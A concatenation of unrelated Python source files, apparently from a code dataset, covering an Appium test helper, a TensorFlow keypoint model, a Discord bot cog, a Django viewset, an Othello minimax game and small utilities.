fake_pmap2 = chex.fake_map()
fake_pmap2.start()
# insert code here
fake_pmap2.stop()
# faking set up of multi-device test environments
def setUpModule():
chex.set_n_cpu_devices() |
22,428 | 896a01af563e266b22915b4ddafd164506f1aaa2 | # coding:utf8
from appium import webdriver
from cfg import desired_caps
class MobileOp:
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
shared_wd = None
def createSession(self):
MobileOp.shared_wd = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
MobileOp.shared_wd.implicitly_wait(10)
def closeSession(self):
MobileOp.shared_wd.quit()
def openFirstArticle(self):
code = u'new UiSelector().resourceId("io.manong.developerdaily:id/tv_title").instance(0)'
ele1 = MobileOp.shared_wd.find_element_by_android_uiautomator(code)
text1 = ele1.text
print text1
ele1.click()
return text1
def getOpenedArticleTitle(self):
ele2 = MobileOp.shared_wd.find_element_by_id('io.manong.developerdaily:id/tv_title')
text2 = ele2.text
return text2
# key is : back, home
def pressKey(self,key):
keycode = None
if key == 'back':
keycode = 4
elif key == 'home':
keycode = 3
MobileOp.shared_wd.press_keycode(keycode)
def isInMainActivity(self):
eles = MobileOp.shared_wd.find_elements_by_id('io.manong.developerdaily:id/tab_bar_plus')
if eles:
return True
else:
return False |
22,429 | 60d6208ef1c30ab58ba1022c6154a8f1905d64d3 | """
Get the arithmetic mean of numbers
----------------------------------
Input: (list) numbers
Output: (float) arithmetic mean of numbers
"""
# fmean() is faster, than mean() and always returns with float
# Python 3.8 is required
from statistics import fmean
numbers = [20, 5, 0, -5, -10]
mean_1 = fmean(numbers)
print('original numbers: {}\nmean: {}'.format(numbers, mean_1))
numbers_2 = [20.0, 5.0, 0, -5.0, -10]
mean_2 = fmean(numbers_2)
print('\noriginal numbers: {}\nmean: {}'.format(numbers_2, mean_2))
numbers_3 = [10, 10, 10]
mean_3 = fmean(numbers_3)
print('\noriginal numbers: {}\nmean: {}'.format(numbers_3, mean_3))
|
22,430 | 96a69961c66784c04ef832f1f2226115c68fdce8 | from os import system
system("clear")
#pilas
ls = [12,13,14,15,16]
print(ls)
s = ls.pop()
print("*"*25)
print(s)
print(ls)
print("*"*25)
#colas
ls = [12,13,14,15,16]
print(ls)
s = ls.pop(0)
print(s)
print(ls)
ls.pop(0)
ls.pop(0)
ls.pop(0)
print(ls) |
22,431 | 3db1abf895e2f3b9a8168cf4b5a75432d9cc101e | from alcloud.third_party.pytorch_3d_cnn.ext_fea import *
from alcloud.config import TEST_RES_DIR
import os
model, opt = init_3d_resnext_feature_extractor()
print(model, opt)
print(extract_video_feature_from_frames(os.path.join(TEST_RES_DIR, 'video', 'video_frames'), model, opt))
|
22,432 | 20ff76bcb9a5d9694e230f3b086a7156dcd3bc76 | from __future__ import print_function
import pandas as pd
import numpy as np
import tensorflow as tf
import time
import csv
# === CONSTANTS ===
data_path = "../data/"
results_path = "../results/"
train_path = data_path + "training.csv"
test_path = data_path + "test.csv"
IdLookupTable_path = results_path + "IdLookupTable.csv"
output_file_path = results_path + "submission.csv"
validation_proportion = 0.1
keypoint_names = ["left_eye_center_x","left_eye_center_y","right_eye_center_x","right_eye_center_y","left_eye_inner_corner_x","left_eye_inner_corner_y","left_eye_outer_corner_x","left_eye_outer_corner_y","right_eye_inner_corner_x","right_eye_inner_corner_y","right_eye_outer_corner_x","right_eye_outer_corner_y","left_eyebrow_inner_end_x","left_eyebrow_inner_end_y","left_eyebrow_outer_end_x","left_eyebrow_outer_end_y","right_eyebrow_inner_end_x","right_eyebrow_inner_end_y","right_eyebrow_outer_end_x","right_eyebrow_outer_end_y","nose_tip_x","nose_tip_y","mouth_left_corner_x","mouth_left_corner_y","mouth_right_corner_x","mouth_right_corner_y","mouth_center_top_lip_x","mouth_center_top_lip_y","mouth_center_bottom_lip_x","mouth_center_bottom_lip_y"]
keypoint_indices = dict((keypoint_name, index) for index, keypoint_name in enumerate(keypoint_names))
image_size = 96
num_keypoints = 15
max_pixel_value = 255
input_size = image_size*image_size
num_hidden = 100
output_size = 2*num_keypoints
learning_rate = 1e-3
dropout_keep_prob = 0.5
num_epochs = 200
batch_size = 100
display_step = 10
plot = True
generate_results = True
flip_indices = [(0, 2), (1, 3), (4, 8), (5, 9), (6, 10), (7, 11), (12, 16), (13, 17), (14, 18), (15, 19), (22, 24), (23, 25)]
# === GET DATA ===
def get_data_set(path, train=True):
# Read data from csv file
df = pd.read_csv(path)
# Drop incomplete rows
df = df.dropna()
# Get X (image pixels)
# Image: Convert string values to numpy arrays
df['Image'] = df['Image'].apply(lambda image: np.fromstring(image, sep=' '))
# Stack all arrays into a numpy array and normalize
X = np.vstack(df['Image'].values)
# Normalize X
X = X / (float(max_pixel_value)/2)
if train:
# Get Y (keypoints coordinates)
Y = df[df.columns[:-1]].values
# Normalize Y
Y = (Y - image_size/2) / (float(image_size)/2)
# Shuffle X and Y
permutation = np.random.permutation(len(X))
X = X[permutation]
Y = Y[permutation]
else:
Y = None
return X, Y
print("Constructing training set...")
train_X, train_Y = get_data_set(train_path, train=True)
valid_index = int(len(train_X) * validation_proportion)
valid_X = train_X[:valid_index]
train_X = train_X[valid_index:]
valid_Y = train_Y[:valid_index]
train_Y = train_Y[valid_index:]
print("Constructing test set...")
test_X, _ = get_data_set(test_path, train=False)
print("\nTrain X")
print(train_X.shape)
print("train_X[0]:",train_X[0])
print("\nTrain Y")
print(train_Y.shape)
print("train_Y[0]:",train_Y[0])
print("\nValid X")
print(valid_X.shape)
print("valid_X[0]:",valid_X[0])
print("\nValid Y")
print(valid_Y.shape)
print("valid_Y[0]:",valid_Y[0])
print("\nTest X")
print(test_X.shape)
print("test_X[0]:",test_X[0])
# === MODEL ===
def new_weights(shape, xavier=True):
dev = 1.0
if xavier and len(shape) == 2:
dev = 1/shape[0]
initial = tf.random_normal(shape, stddev=dev)
return tf.Variable(initial)
def new_biases(shape, xavier=True):
dev = 1.0
if xavier and len(shape) == 2:
dev = 1/shape[0]
initial = tf.random_normal(shape, stddev=dev)
return tf.Variable(initial)
def simple_linear_layer(input,shape):
assert (len(shape) == 2),"Shape : [input,output]"
weights = new_weights(shape)
biases = new_biases([shape[-1]])
logits = tf.matmul(input, weights) + biases
return logits
def simple_relu_layer(input,shape,dropout_keep_prob=None):
logits = simple_linear_layer(input,shape)
logits = tf.nn.relu(logits)
if not dropout_keep_prob is None:
logits = tf.nn.dropout(logits, dropout_keep_prob)
return logits
def one_hidden_layer_model(input,dropout_keep_prob=None):
with tf.name_scope('hidden_layer'):
hidden_logits = simple_relu_layer(input,[input_size,num_hidden],dropout_keep_prob=keep_prob)
with tf.name_scope('output_layer'):
output_logits = simple_linear_layer(hidden_logits,[num_hidden,output_size])
return output_logits
print ("\nConstructing model...")
with tf.name_scope('placeholders'):
pixels = tf.placeholder(tf.float32, shape=[None, input_size])
keypoints = tf.placeholder(tf.float32, shape=[None, output_size])
keep_prob = tf.placeholder(tf.float32)
with tf.name_scope('model'):
predicted_keypoints = one_hidden_layer_model(pixels,dropout_keep_prob=keep_prob)
with tf.name_scope('loss'):
loss = tf.sqrt(tf.reduce_mean(tf.square(predicted_keypoints - keypoints)))
with tf.name_scope('Train_step'):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
init = tf.initialize_all_variables()
# === TRAINING MODEL ===
def seconds2minutes(time):
minutes = int(time) // 60
seconds = int(time) % 60
return minutes, seconds
with tf.Session() as session:
session.run(init)
num_examples = len(train_X)
num_steps_per_epoch = num_examples//batch_size
absolute_step = 0
steps = []
train_losses = []
valid_losses = []
print("\nSTART TRAINING (",num_epochs,"epochs,",num_steps_per_epoch,"steps per epoch )")
begin_time = time_0 = time.time()
for epoch in range(num_epochs):
print("*** EPOCH",epoch,"***")
for step in range(num_steps_per_epoch):
batch_X = train_X[step * batch_size:(step + 1) * batch_size]
batch_Y = train_Y[step * batch_size:(step + 1) * batch_size]
_ = session.run(train_step, feed_dict={pixels: batch_X, keypoints: batch_Y, keep_prob: dropout_keep_prob})
absolute_step += 1
if step % display_step == 0:
train_loss = session.run(loss, feed_dict={pixels: batch_X, keypoints: batch_Y, keep_prob: 1.0})
valid_loss = session.run(loss, feed_dict={pixels: valid_X, keypoints: valid_Y, keep_prob: 1.0})
print("Batch Loss =",train_loss,"at step",absolute_step)
print("Validation Loss =",valid_loss,"at step",absolute_step)
print("Estimated Score =",valid_loss*image_size/2,"at step",absolute_step)
steps.append(absolute_step)
train_losses.append(train_loss)
valid_losses.append(valid_loss)
# Time spent is measured
if absolute_step > 0:
t = time.time()
d = t - time_0
time_0 = t
print("Time:",d,"s to compute",display_step,"steps")
last_batch_X = train_X[num_examples * batch_size:]
last_batch_Y = train_Y[num_examples * batch_size:]
_ = session.run(train_step, feed_dict={pixels: last_batch_X, keypoints: last_batch_Y, keep_prob: dropout_keep_prob})
absolute_step += 1
total_time = time.time() - begin_time
total_time_minutes, total_time_seconds = seconds2minutes(total_time)
print("*** Total time to compute",num_epochs,"epochs:",total_time_minutes,"minutes and",total_time_seconds,"seconds (",total_time,"s)***")
# === TEST ===
test_predictions = []
num_test_steps = len(test_X)//batch_size
print('\n*** Start testing (',num_test_steps,'steps ) ***')
for step in range(num_test_steps):
batch_X = test_X[step * batch_size:(step + 1) * batch_size]
pred = session.run(predicted_keypoints, feed_dict={pixels : batch_X, keep_prob: 1.0})
test_predictions.extend(pred)
last_batch_X = test_X[num_test_steps * batch_size:]
pred = session.run(predicted_keypoints, feed_dict={pixels : last_batch_X, keep_prob: 1.0})
test_predictions.extend(pred)
test_predictions = np.array(test_predictions)
test_predictions = test_predictions * image_size/2 + image_size/2
print('Test prediction',test_predictions.shape)
# === PLOTTING ===
if plot:
print("Plotting...")
import matplotlib.pyplot as plt
plt.plot(steps, train_losses, 'ro', steps, valid_losses, 'bs')
x1,x2,y1,y2 = plt.axis()
# plt.axis((x1,x2,0,50))
plt.show()
# === GENERATE SUBMISSION FILE ===
def get_predictions_indices(IdLookupTable,keypoint_indices,imageId):
feature_names = IdLookupTable[IdLookupTable["ImageId"] == imageId]["FeatureName"].tolist()
return [keypoint_indices[feature_name] for feature_name in feature_names]
if generate_results:
print("Reading IdLookupTable...")
IdLookupTable = pd.read_csv(IdLookupTable_path)
print('Generating submission file...')
with open(output_file_path, 'w') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['RowId','Location'])
rowid = 1
for i in range(len(test_predictions)):
imageId = i + 1
predictions = test_predictions[i]
for j in get_predictions_indices(IdLookupTable,keypoint_indices,imageId):
prediction = predictions[j]
if prediction < 0:
prediction = 0
elif prediction > image_size:
prediction = image_size
writer.writerow([rowid,prediction])
rowid += 1
print('Results saved to',output_file_path) |
22,433 | a56d738906958096571e6939c3cca18e931aa421 | from alaska2.alaska_pytorch.models import *
MODELS_SAVE_DIR = "imagenet/checkpoints/"
TENSORBOARD_LOGS_DIR = "imagenet/tensorboard_logs/"
SEED = 2020
EXPERIMENT_HYPER_PARAMETERS = {
0: {
"model_name": "dct_efficientnet_b7_no_weight_sharing",
"model": build_dct_efficientnet_b7_no_weight_sharing,
"input_data_type": "DCT",
"n_classes": 1000,
"use_quality_factor": False,
"separate_classes_by_quality_factor": False,
"use_amp": True,
"devices": [0, 1],
"seed": 2020,
"validation_split": 0.2,
# Model parameters:
"trained_model_path": "imagenet/checkpoints/dct_efficientnet_b7_no_weight_sharing_1593595066_checkpoint.pth",
# Training loop:
"batch_size": 112,
"n_epochs": 1000,
"learning_rate": 0.0002,
"lr_scheduler_exp_gamma": 0.95,
"training_workers": 10,
# Other:
"model_checkpoint_dir": MODELS_SAVE_DIR,
"tensorboard_log_dir": TENSORBOARD_LOGS_DIR,
"log_tensorboard_n_times_per_epoch": 100,
},
}
|
22,434 | 24bb1688e3690c3879440cb489f6349732c61eeb | import matplotlib.pyplot as plt
import numpy as np
#D = 1e-7
rho = 1.225
nu = 1.48e-5
#u0 = 10.
D = 1
#nu = 1e-2
u0 = 10
x = np.linspace(0, 5000000, 50)
y = np.arange(-5, 5, .1)
X, Y = np.meshgrid(x, y)
u = D / (rho * ( 4 * np.pi * u0 * nu) ** .5) * (X ** -.5) * np.exp(- 1 * u0 * Y ** 2 / 4 / nu / X)
#plt.xlim(0, 1)
plt.contourf(X, Y, u0 - u, 1000)
plt.show()
|
22,435 | e6abb323d649cebcea8f3ec3e0866dbbfa61d634 | import json
import logging
import random
from pathlib import Path
from discord.ext import commands
logger = logging.getLogger(__name__)
with open(Path('bot', 'resources', '8ball.json'), 'r', encoding="utf8") as f:
eightBallJSON = json.load(f)
class MiniGames(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=('8ball',))
async def eightball(self, ctx, question: str = None):
"""Mystic Eight Ball - Responds With Random Answer"""
if question is None:
await ctx.send("Error, you have to ask a question!")
else:
await ctx.send(random.choice(eightBallJSON['answers']))
@commands.command(name='choice')
async def choices(self, ctx, *, options):
"""
Having a hard time choosing between something?
Try this command!
"""
choices = options.split('-')
choice = random.choice(choices)
await ctx.send(f'My choice is\"{choice}\"')
def setup(bot):
bot.add_cog(MiniGames(bot))
logger.info('MiniGames cog loaded.')
|
22,436 | 432fccfeb314c99af59ff37d667fbe05ccdcf71b | FENWAY_PARK = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name_or_'
'venue_name_i_cont%5D=fenway&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_cont%5D=&commit=Search#'
)
GILLETTE_STADIUM = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name'
'_or_venue_name_i_cont%5D=gillette&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_cont%5D=&comm'
'it=Search'
)
NEEDHAM_PUBLIC_HEALTH = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name_'
'or_venue_name_i_cont%5D=Needham+Public&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_cont%'
'5D=&commit=Search#search_results'
)
REGGIE_LEWIS = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_name_o'
'r_venue_name_i_cont%5D=Reggie+Lewis+State+Track&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_'
'cont%5D=&commit=Search#search_results'
)
MARSHFIELD = (
'https://www.maimmunizations.org/clinic/search?location=&search_radius=All&q%5Bvenue_search_'
'name_or_venue_name_i_cont%5D=Marshfield&q%5Bclinic_date_gteq%5D=&q%5Bvaccinations_name_i_'
'cont%5D=&commit=Search#search_results'
)
ALL_SITES = {
'FENWAY_PARK': FENWAY_PARK,
'GILLETTE_STADIUM': GILLETTE_STADIUM,
'NEEDHAM_PUBLIC_HEALTH': NEEDHAM_PUBLIC_HEALTH,
'REGGIE_LEWIS': REGGIE_LEWIS,
'MARSHFIELD': MARSHFIELD,
}
|
22,437 | e8194fca568e1d25eb21f7e6bf52002eaeb1887c | class Attractions:
def __init__(self, path):
self.path_file = path
self.text = ""
self.list_attractions = []
self.set_attractions = set()
def ReadFileText(self):
file = open(self.path_file, 'r', encoding='utf-8')
self.text = file.read()
file.close()
def ListAttractions(self):
list_string = self.text.split('\n')
for i in range(len(list_string)):
if '\tAttractionS' == list_string[i] or '\tAttractionFIO' == list_string[i]:
self.list_attractions.append((list_string[i:i + 4]))
def SetAttractions(self):
for i in self.list_attractions:
i = i[2].split(' = ')[1]
self.set_attractions.add(i)
|
22,438 | fdff574afec95ff884d4b250ada83144ebe1e464 | class Constants:
IMAGE = "img"
TEXT = "text"
class Builder:
MAIN_WINDOW = "main_window"
IMAGE = "image"
IMAGE_FRAME = "image_frame"
DRAW_AREA = "drawarea" |
22,439 | abfd623d7c6078a66fc72d91d04235a50d84e8ca | from dataclasses import dataclass
@dataclass
class Ingredient:
name: str
quantity: int
refill_threshold: int
|
22,440 | 36c9d8d2b7d43eaf7567f5a9f75b1eda39dfd688 | from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import viewsets, mixins, status
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from core.models import Product
from product import serializers
class BaseProductAttrViewSet(viewsets.GenericViewSet,
mixins.ListModelMixin,
mixins.CreateModelMixin):
"""Base viewset for user owned recipe attributes"""
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
def get_queryset(self):
"""Return objects for the current authenticated user only"""
assigned_only = bool(
int(self.request.query_params.get('assigned_only', 0))
)
queryset = self.queryset
if assigned_only:
queryset = queryset.filter(recipe__isnull=False)
return queryset.filter(user=self.request.user).order_by('-name')
def perform_create(self, serializer):
"""Create a new object"""
serializer.save(user=self.request.user)
# class TagViewSet(BaseProductAttrViewSet):
# """Manage tags in the database"""
# queryset = Tag.objects.all()
# serializer_class = serializers.TagSerializer
#
#
# class IngredientViewSet(BaseProductAttrViewSet):
# """Manage ingredients in the database"""
# queryset = Ingredient.objects.all()
# serializer_class = serializers.IngredientSerializer
class ProductViewSet(viewsets.ModelViewSet):
"""Manage recipes in the database"""
serializer_class = serializers.ProductSerializer
queryset = Product.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
def _params_to_ints(self, qs):
"""Convert a list of string IDs to a list on integers"""
return [int(str_id) for str_id in qs.split(',')]
def get_queryset(self):
"""Retrieve the product for the authenticated user"""
# tags = self.request.query_params.get('tags')
# ingredients = self.request.query_params.get('ingredients')
queryset = self.queryset
# if tags:
# tag_ids = self._params_to_ints(tags)
# queryset = queryset.filter(tags__id__in=tag_ids)
# if ingredients:
# ingredient_ids = self._params_to_ints(ingredients)
# queryset = queryset.filter(ingredients__id__in=ingredient_ids)
return queryset.filter(user=self.request.user).order_by('-id')
def get_serializer_class(self):
"""Return appropriate serializer class"""
if self.action == 'retrieve':
return serializers.ProductDetailSerializer
return self.serializer_class
def perform_create(self, serializer):
"""Create a new recipe"""
serializer.save(user=self.request.user) |
22,441 | 67d40691838815a592d0ecbe4d8d7978c00ba47e | import numpy as np
import random
import time
import collections
import math
import sys
import pygame
from copy import deepcopy
SIZE = 6
# Class created by Jalen Jackson
class Stone:
def __init__(self, row, col, state):
self.state = state
self.row = row
self.col = col
# Initalize as a dictionary
self.neighbors = collections.defaultdict(lambda: None)
# Prints the type of stone
def __repr__(self):
return str(self.state)
# Class created by Jalen Jackson
class Board:
# Initializes the board with two black and two white stones on the middle of the board with size N
def __init__(self, size):
self.size = SIZE
self.stones = [[None] * size for i in range(0, size)]
for j in range(SIZE):
for i in range(SIZE):
self.insert(Stone(i, j, "-"))
middleLeft = int((self.size / 2) - 1)
middleRight = int(self.size / 2)
blackStoneOne = Stone(middleLeft, middleLeft, "B")
blackStoneTwo = Stone(middleRight, middleRight, "B")
self.insert(blackStoneOne)
self.insert(blackStoneTwo)
whiteStoneOne = Stone(middleLeft, middleRight, "W")
whiteStoneTwo = Stone(middleRight, middleLeft, "W")
self.insert(whiteStoneOne)
self.insert(whiteStoneTwo)
def count(self, state):
count = 0
for j in range(SIZE):
for i in range(SIZE):
stone = self.get_stone_at(i, j)
if stone.state == state:
count += 1
return count
# Inserts the stone on the board at a specific row & column set in the stone's constructor
def insert(self, stone):
self.stones[stone.row][stone.col] = stone
# Gets the stone at the row and column specified in the function
def get_stone_at(self, row, col):
return self.stones[int(row)][int(col)]
# Returns a dictionary of stones adjacent to the stone specified in the paramter.
# Key: Returns the direction between the stone and the neighbor
# Value: Returns the neighbor
def neighbors_of(self, stone):
if stone is None:
return None
if stone.row - 1 >= 0:
stone.neighbors.update({"NORTH": self.stones[stone.row - 1][stone.col]})
if stone.row + 1 < self.size:
stone.neighbors.update({"SOUTH": self.stones[stone.row + 1][stone.col]})
if stone.col - 1 >= 0:
stone.neighbors.update({"WEST": self.stones[stone.row][stone.col - 1]})
if stone.col + 1 < self.size:
stone.neighbors.update({"EAST": self.stones[stone.row][stone.col + 1]})
if stone.row - 1 >= 0 and stone.col - 1 >= 0:
stone.neighbors.update(
{"NORTHWEST": self.stones[stone.row - 1][stone.col - 1]}
)
if stone.row - 1 >= 0 and stone.col + 1 < self.size:
stone.neighbors.update(
{"NORTHEAST": self.stones[stone.row - 1][stone.col + 1]}
)
if stone.row + 1 < self.size and stone.col - 1 >= 0:
stone.neighbors.update(
{"SOUTHWEST": self.stones[stone.row + 1][stone.col - 1]}
)
if stone.row + 1 < self.size and stone.col + 1 < self.size:
stone.neighbors.update(
{"SOUTHEAST": self.stones[stone.row + 1][stone.col + 1]}
)
return stone.neighbors
# Prints the board
def __repr__(self):
board = "\n\t Column\nRow\t"
r = 0
for c in range(0, self.size):
board += str(c) + " "
board += "\n"
for col in np.array(self.stones):
board += str(r) + "\t"
for stone in col:
board += str(stone) + " "
board += "\n"
r += 1
return board
# Created By Felicia based on algorithm psuedocode
# Input: stone object, int depth, bool maxPlayer
# Output: hueristic value assignments to legal moves for current play
def mini_max(board, depth=2, alpha=-math.inf, beta=math.inf, maxPlayer=True):
if maxPlayer == True:
moves = legal_moves(board, "W")
else:
moves = legal_moves(board, "B")
if depth == 0 or moves == None:
return set_heuristic_value(board)
elif maxPlayer:
value = -math.inf
for move in moves:
futureBoard = deepcopy(board)
apply_move(move.row, move.col, "W", futureBoard)
value = max(value, mini_max(futureBoard, depth - 1, alpha, beta, False))
alpha = max(alpha, value)
if alpha >= beta:
break
return value
else: # minPlayer
value = math.inf
for move in moves:
futureBoard = deepcopy(board)
apply_move(move.row, move.col, "B", futureBoard)
value = min(value, mini_max(futureBoard, depth - 1, alpha, beta, True))
beta = min(beta, value)
if alpha >= beta:
break
return value
def get_user_postion():
row = int(input("Please Enter a row: "))
col = int(input("Please Enter a column: "))
return row, col
# created by Felicia
# Modified by Jalen
def legal_moves(board, player):
movesList = []
enemyPieces = []
if player == "W":
enemy = "B"
else:
enemy = "W"
# get a list of all of the opponents pieces
for i in range(SIZE):
for j in range(SIZE):
stone = board.get_stone_at(i, j)
if stone.state == enemy:
enemyPieces.append(stone)
# Helper function for my modifications to find the directions of the flank
def check_directions(neighbors, directionOne, directionTwo):
if directionOne not in neighbors:
return
if directionTwo not in neighbors:
return
if neighbors[directionOne].state == player:
if (
neighbors[directionTwo].state == "-"
and neighbors[directionTwo] not in movesList
):
movesList.append(neighbors[directionTwo])
return
else:
while neighbors[directionTwo].state == enemy:
moveNeighbors = board.neighbors_of(neighbors[directionTwo])
if directionTwo not in moveNeighbors:
return
if (
moveNeighbors[directionTwo].state == "-"
and moveNeighbors[directionTwo] not in movesList
):
movesList.append(moveNeighbors[directionTwo])
return
neighbors.update({directionTwo: moveNeighbors[directionTwo]})
if neighbors[directionTwo].state == player:
if (
neighbors[directionOne].state == "-"
and neighbors[directionOne] not in movesList
):
movesList.append(neighbors[directionOne])
return
else:
while neighbors[directionOne].state == enemy:
moveNeighbors = board.neighbors_of(neighbors[directionOne])
if directionOne not in moveNeighbors:
return
if (
moveNeighbors[directionOne].state == "-"
and moveNeighbors[directionOne] not in movesList
):
movesList.append(moveNeighbors[directionOne])
return
neighbors.update({directionOne: moveNeighbors[directionOne]})
for stone in enemyPieces:
check_directions(board.neighbors_of(stone), "NORTH", "SOUTH")
check_directions(board.neighbors_of(stone), "EAST", "WEST")
check_directions(board.neighbors_of(stone), "NORTHEAST", "SOUTHWEST")
check_directions(board.neighbors_of(stone), "NORTHWEST", "SOUTHEAST")
movesList.sort(key=lambda stone: (stone.row, stone.col))
return movesList
# Created By James
# Function that places a stone
def place_stone(row, col, board, player):
newStone = Stone(row, col, player)
board.insert(newStone)
# Created by Rahin
# Function to check who won
# Jalen fixed error 'board.b[i][j]
def winner(board):
whites = 0
blacks = 0
empty = 0
for j in range(SIZE):
for i in range(SIZE):
if board.get_stone_at(i, j).state == "W":
whites += 1
elif board.get_stone_at(i, j).state == "B":
blacks += 1
else:
empty += 1
if blacks > whites:
return "Black"
elif whites > blacks:
return "White"
else:
return "Tie"
# Modified by Felicia
def convert_line(startStone, board):
enemy = None
if startStone.state is "B":
enemy = "W"
elif startStone.state is "W":
enemy = "B"
neighbors = board.neighbors_of(startStone)
flankStack = list(
filter(
lambda stone: stone is not None and stone[1].state == enemy,
neighbors.items(),
)
)
while len(flankStack) > 0:
# grab off stack
flipList = []
currentFlank = flankStack.pop(0)
# get the direction
flankDirection = currentFlank[0]
# move in that direction
flankStone = currentFlank[1]
# change the stone?
while flankStone.state == enemy:
flipList.append(flankStone)
flankStone = flankStone.neighbors.get(flankDirection)
# Jalen added this in order to check if there is no stone being checked
if flankStone is None:
return
if flankStone.state == startStone.state:
while flipList:
currentStone = flipList.pop()
apply_move(currentStone.row, currentStone.col, startStone.state, board)
def valid(row, col):
if row >= 0 and row < SIZE and col < SIZE and col >= 0:
return True
else:
return False
def apply_move(row, col, player, board):
stone = board.get_stone_at(row, col)
stone.state = player
board.insert(stone)
convert_line(stone, board)
# Function created by Felicia
# Finished by Jalen
def set_heuristic_value(board):
score = 0
# Evaluate disc count
score += board.count("W") / 100
score -= board.count("B") / 100
# Legal Moves Count
score += len(legal_moves(board, "W"))
score -= len(legal_moves(board, "B"))
# Corners Captured
topLeftCorner = board.get_stone_at(0, 0)
topRightCorner = board.get_stone_at(0, SIZE - 1)
botLeftCorner = board.get_stone_at(SIZE - 1, 0)
botRightCorner = board.get_stone_at(SIZE - 1, SIZE - 1)
whiteCornersCaptured = 0
blackCornersCaptured = 0
if topLeftCorner.state == "W":
whiteCornersCaptured += 1
elif topLeftCorner.state == "B":
blackCornersCaptured += 1
if botLeftCorner.state == "W":
whiteCornersCaptured += 1
elif botLeftCorner.state == "B":
blackCornersCaptured += 1
if topRightCorner.state == "W":
whiteCornersCaptured += 1
elif topRightCorner.state == "B":
blackCornersCaptured += 1
if botRightCorner.state == "W":
whiteCornersCaptured += 1
elif botRightCorner.state == "B":
blackCornersCaptured += 1
score += 10 * whiteCornersCaptured
score -= 10 * blackCornersCaptured
return score
# TODO
def pick_best_move(moves, board):
bestMove = random.choice(moves)
bestValue = -math.inf
for move in moves:
futureBoard = deepcopy(board)
apply_move(move.row, move.col, "W", futureBoard)
value = mini_max(futureBoard)
if bestValue > value:
bestMove = move
value = bestValue
return bestMove
# Created By Felicia
# input: None
# Controls the game flow
def play_game():
sys.setrecursionlimit(1000)
#pygame Added
pygame.init()
size = width,height = 800, 600
green = 46,139,87
white = 255,255,255
gray = 192,192,192
black = 0,0,0
widthLines = (width)//SIZE
heightLines = height//SIZE
square = int(np.sqrt(width*height//(SIZE*SIZE))) #size of each square
rad = square//4
shiftR = int(square/2* width/height)
shiftD = int(square/2* height/width)
screen= pygame.display.set_mode(size)
#end of pygame
board = Board(SIZE)
for i in range(SIZE):
for j in range(SIZE):
board.neighbors_of(board.get_stone_at(i, j))
gameInPlay = True
# assume Player1 is 'B' stones
player1 = True
passedTurn = False
while gameInPlay:
#pygame stuff
screen.fill(green)
for i in range(SIZE):
j = i +1
pygame.draw.line(screen, gray,(widthLines*j, height), (widthLines*j, 0),1 )
for i in range(SIZE):
j = i +1
pygame.draw.line(screen, gray,(width, heightLines*j), (0, heightLines*j),1 )
for i in range(SIZE):
for j in range(SIZE):
stone = (board.get_stone_at(i, j))
if stone.state == 'W':
pygame.draw.circle(screen, white, [i*widthLines+shiftR, j*heightLines+shiftD], rad)
elif stone.state == 'B':
pygame.draw.circle(screen, black, [i*widthLines+shiftR, j*heightLines+shiftD], rad)
pygame.display.flip()
#end of pygame
print(board)
moves = []
print("Black Stones: " + str(board.count("B")))
print("White Stones: " + str(board.count("W")))
# players turn
if player1 == True:
moves = legal_moves(board, "B")
for i in moves:
print(i.row, i.col)
# no legal moves means player forfeits turn
if not moves:
player1 = False
# if the opposing player was unable to make a move the game is over
if passedTurn == True:
break
else:
passedTurn = True
# otherwise get input from player
else:
position = False
passedTurn = False
while position == False:
# row, col = get_user_postion() # return x,y
move = random.choice(moves)
row = move.row
col = move.col
time.sleep(2)
if valid(row, col):
playerMove = board.get_stone_at(row, col)
if playerMove in moves: # if it's a legal move
apply_move(playerMove.row, playerMove.col, "B", board)
position = True # next turn
player1 = False
# The Computers turn
else:
moves = legal_moves(board, "W")
for i in moves:
print(i.row, i.col)
if not moves:
if passedTurn == True:
break
else:
passedTurn = True
player1 = True
else:
passedTurn = False
# pick the highest value
compMove = pick_best_move(moves, board)
# TODO need to validate move
time.sleep(2)
if valid(compMove.row, compMove.col):
apply_move(compMove.row, compMove.col, "W", board)
player1 = True
whoWon = winner(board)
if whoWon == "Black" or whoWon == "White":
print(whoWon + " Won")
else:
print(whoWon)
time.sleep(10)
# TODO do something
if __name__ == "__main__":
play_game()
|
22,442 | f51e73745e0d4075a348e96d2f674caf60a0d4ac | import subprocess
import shlex
import logging
import pyfastx
import random
import jinja2
import sys
from pathlib import Path
from functools import reduce
from operator import getitem
class PoreLogger:
def __init__(self, level=logging.ERROR, name: str = None):
logging.basicConfig(
level=level,
format=f"[%(asctime)s] [{name}] %(message)s",
datefmt='%H:%M:%S',
)
self.logger = logging.getLogger()
def get_output_handle(fpath: str, fastx: bool = False, out: bool = True):
if fpath == "-":
if out:
handle = sys.stdout
else:
handle = sys.stdin
else:
p = Path(fpath)
if not p.parent.is_dir():
raise NotADirectoryError(
"Directory specified for output file does not exist: {}".format(
p.parent
)
)
if fastx:
if fpath.endswith("a"):
handle = pyfastx.Fasta(p)
else:
handle = pyfastx.Fastq(p)
else:
handle = p.open("w")
return handle
def run_cmd(cmd, callback=None, watch=False, background=False, shell=False):
"""Runs the given command and gathers the output.
If a callback is provided, then the output is sent to it, otherwise it
is just returned.
Optionally, the output of the command can be "watched" and whenever new
output is detected, it will be sent to the given `callback`.
Returns:
A string containing the output of the command, or None if a `callback`
was given.
Raises:
RuntimeError: When `watch` is True, but no callback is given.
"""
